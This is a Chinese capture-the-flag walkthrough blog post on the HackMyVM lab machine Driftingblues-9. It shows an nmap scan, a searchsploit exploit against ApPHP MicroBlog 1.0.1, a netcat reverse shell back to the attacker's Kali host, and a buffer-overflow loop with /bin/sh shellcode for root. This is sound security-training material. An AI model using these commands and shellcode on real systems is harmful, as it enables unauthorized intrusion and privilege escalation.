Hackmyvm综合靶机 | Driftingblues-9(完结)

前言提要

终于把这个系列的靶机打完了,后面会做一个小总结,近期暂时会把靶机练习放一段时间往其他知识点上去学习学习…
老实说感觉自己打了这一段的时间的靶机了,每次都会有新的问题也会get新的知识,究于还是自己的深度没有到一定位置,我的前路还有一篇宝藏等着我去挖掘!!!!
比如这个靶机其实十分简单但我不会缓冲区溢出(后续会去了解…)

kali:192.168.132.139

靶机IP:192.168.132.178

信息收集

nmap -A -sV -p- -T4 192.168.132.178

image-20220414213555562

web页面有一个后台管理员登陆口

This script was generated by ApPHP MicroBlog v.1.0.1

搜索一下相关漏洞

searchsploit ApPHP MicroBlog 1.0.1
searchsploit -m 33070.py
cat 33070.py

image-20220414215754558

python2 33070.py http://192.168.132.178/index.php 

发现一处账号密码,反弹shell试试、

kali:rlwrap nc -lvnp 1234
nc 192.168.132.139 1234 -e /bin/bash

发现有 clapton 用户,和数据库中的用户一样,尝试登录一下 clapton 用户

image-20220414220437850

提示缓冲区溢出,并给出俩个案例

https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm

缓冲区溢出提权(我不会)

这里带师傅链接:https://www.cnblogs.com/sainet/p/15789449.html

for i in {1..10000}; do (./input $(python -c 'print("A" * 171 + "\xe0\x13\x8b\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')); done

image-20220414220834679

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1erkeU

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值